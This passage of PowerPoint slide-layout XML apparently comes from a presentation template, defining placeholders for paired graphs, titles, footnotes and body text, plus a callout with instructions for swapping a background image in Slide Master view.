            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8DC738-4037-4237-BAB7-86B39D39E3DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1457194"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFF319E-6DBC-44DF-A53F-FCD666A4AD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1999130"/>
            <a:ext cx="5327650" cy="3854824"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59693680-0040-4E91-884A-D427AF4875DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1999130"/>
            <a:ext cx="5327650" cy="3854824"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733755BA-71D4-4CBA-B704-A972C8D5EFBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="6024283"/>
            <a:ext cx="5328000" cy="167809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F58ECE0-1B4F-46E5-BD09-716EBD33EB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="6024283"/>
            <a:ext cx="5328000" cy="167809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4216279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ogo on image">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="40000"/>
            <a:lumOff val="60000"/>
          </a:schemeClr>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C26AD0A-B2DA-4BA8-971E-89A9C370B04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4149377" y="1520825"/>
            <a:ext cx="3893247" cy="3810079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECEA45CE-9FBB-4092-B760-6394BC9DB745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323037" y="6129338"/>
            <a:ext cx="7166539" cy="381001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Callout: Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6FF6F57-64A0-481E-B106-E7EF12554A98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="12783531" y="0"/>
            <a:ext cx="2038121" cy="4617720"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 23170"/>
              <a:gd name="adj4" fmla="val -23198"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to change image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Click on ‘View’ on the menu bar</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Choose ‘Slide Master’ </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Insert image and size to fit the page (make sure the coloured strip isn’t covered on the right hand side)</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Right click on the image and choose ‘send to back’</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 View ‘normal’ to exit Slide Master Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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53939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 graphs with text &amp; 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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6022713" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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7" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE376A4-7281-4F17-A9FD-693411D93715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1457194"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8DC738-4037-4237-BAB7-86B39D39E3DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1457194"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFF319E-6DBC-44DF-A53F-FCD666A4AD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1999130"/>
            <a:ext cx="5327650" cy="2411505"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59693680-0040-4E91-884A-D427AF4875DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1999130"/>
            <a:ext cx="5327650" cy="2411505"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733755BA-71D4-4CBA-B704-A972C8D5EFBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="6024283"/>
            <a:ext cx="5328000" cy="167809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F58ECE0-1B4F-46E5-BD09-716EBD33EB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="6024283"/>
            <a:ext cx="5328000" cy="167809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8486FD2-0742-409A-B501-45247128BE73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="4544359"/>
            <a:ext cx="5327643" cy="1363382"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="134938" indent="-134938">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add first level body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5C67F9-AB20-4602-8838-A39953428D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="4544359"/>
            <a:ext cx="5327643" cy="1363382"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="134938" indent="-134938">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add first level body copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27087054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 graphs with titles n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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE376A4-7281-4F17-A9FD-693411D93715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1457194"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
